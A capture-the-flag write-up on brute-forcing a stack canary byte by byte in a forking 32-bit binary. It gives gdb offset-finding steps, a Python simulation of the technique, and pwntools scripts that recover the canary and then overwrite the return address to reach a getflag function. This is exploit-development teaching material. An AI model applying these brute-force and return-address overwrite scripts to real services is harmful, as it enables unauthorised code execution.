Principle of brute-forcing the canary byte by byte
- Although a process gets a different canary each time it is restarted, the canary is the same across the threads of one process, and a child process created by fork has the same canary as its parent, because fork copies the parent's memory directly.
- The lowest byte of the canary is 0x00. The remaining bytes are brute-forced one at a time: if a guess is wrong, the canary check fails and the program crashes; if it is right, the program continues with its normal logic. That difference tells us whether each guess succeeded.
- Using these properties, the whole canary can be recovered one byte at a time.
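To make the reasoning concrete, the following added example (not part of this writeup) models a forking server whose frame is [buf][canary] and shows why partially overwriting the canary turns a 2^24 search into at most 3*256 attempts. The names make_canary, child_handles_input and recover_canary, the buffer size and the oracle are assumptions of this model; the recovery stops with an error when no byte ever matches, which is what you see when each attempt gets a fresh canary instead of an inherited one.

```python
import os

# Constructed model (not the writeup's binary): a 100-byte buffer followed by a
# 4-byte canary whose low byte is 0x00, shared by every forked child.
CANARY_LEN = 4
BUF_LEN = 100


def make_canary():
    """Random canary with the low byte forced to 0x00, as in the text."""
    return b"\x00" + os.urandom(CANARY_LEN - 1)


def child_handles_input(canary, data):
    """Model of the vulnerable function running in one forked child.

    The frame is [buf][canary]; a write longer than BUF_LEN spills into the
    canary, but any canary bytes beyond the write keep their original value.
    The check at return compares all 4 bytes, so it passes exactly when the
    overwritten prefix is correct. Returns True if the child survives, False
    if it aborts (stack smashing detected).
    """
    frame = bytearray(b"\x00" * BUF_LEN + canary)
    data = data[:BUF_LEN + CANARY_LEN]
    frame[:len(data)] = data
    return bytes(frame[BUF_LEN:]) == canary


def recover_canary(oracle):
    """Byte-by-byte recovery as described above: keep the known prefix (low
    byte 0x00) and try 256 candidates for the next byte. Returns the recovered
    canary and how many child processes it cost."""
    known = b"\x00"
    attempts = 0
    while len(known) < CANARY_LEN:
        for guess in range(256):
            attempts += 1
            if oracle(b"a" * BUF_LEN + known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError("no byte matched: canary is not stable across attempts")
    return known, attempts


if __name__ == "__main__":
    secret = make_canary()
    found, cost = recover_canary(lambda d: child_handles_input(secret, d))
    print("recovered %s in %d attempts (worst case %d)" % (found.hex(), cost, 3 * 256))
```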
Example
Canary protection is enabled.
Disassembling the program in IDA shows that it calls fork, so the canary can probably be brute-forced.
The stack overflow is in the function fun.
Dynamic debugging to find the offsets
Set one breakpoint at the function called after fork,
and a second breakpoint at the instruction that pushes the canary.
gdb bin1
b *0x0804874B
b *0x0804870C
r
set follow-fork-mode child
// follow the child process
c
telescope $esp 35
canary
- From this we can work out the offset between the canary and ebp;
- and likewise the offset between buf and ebp.
Write the exploit and brute-force the canary
from pwn import *
# Python 2 / pwntools script
context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-x', 'bash', '-c']
context(arch='i386', os='linux')
local = 1
elf = ELF('./bin1')
if local:
    p = process('./bin1')
    libc = elf.libc
else:
    p = remote('',)
    libc = ELF('./')
p.recvuntil('welcome\n')
# the lowest byte of the canary is always 0x00; recover the other three bytes
canary = '\x00'
for k in range(3):
    for i in range(256):
        print "the " + str(k) + ": " + chr(i)
        # fill the 100-byte buffer, then overwrite only the known canary bytes plus one guessed byte
        p.send('a' * 100 + canary + chr(i))
        # a wrong guess kills the child; the parent forks again and prints the banner
        a = p.recvuntil("welcome\n")
        print a
        # the program prints "sucess" only when the canary check passed
        if "sucess" in a:
            canary += chr(i)
            print "canary: " + canary
            break
Then send a payload with the address of the getflag function to get the flag.
from pwn import *
# Python 2 / pwntools script
context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-x', 'bash', '-c']
context(arch='i386', os='linux')
local = 1
elf = ELF('./bin1')
if local:
    p = process('./bin1')
    libc = elf.libc
else:
    p = remote('',)
    libc = ELF('./')
p.recvuntil('welcome\n')
# the lowest byte of the canary is always 0x00; recover the other three bytes
canary = '\x00'
for k in range(3):
    for i in range(256):
        print "the " + str(k) + ": " + chr(i)
        # fill the 100-byte buffer, then overwrite only the known canary bytes plus one guessed byte
        p.send('a' * 100 + canary + chr(i))
        # a wrong guess kills the child; the parent forks again and prints the banner
        a = p.recvuntil("welcome\n")
        print a
        # the program prints "sucess" only when the canary check passed
        if "sucess" in a:
            canary += chr(i)
            print "canary: " + canary
            break
# address of the getflag function (from the disassembly)
addr = 0x0804863B
# buffer, the recovered canary, 12 bytes of padding up to and including the saved ebp, then the return address
payload = 'A' * 100 + canary + 'A' * 12 + p32(addr)
p.send(payload)
p.interactive()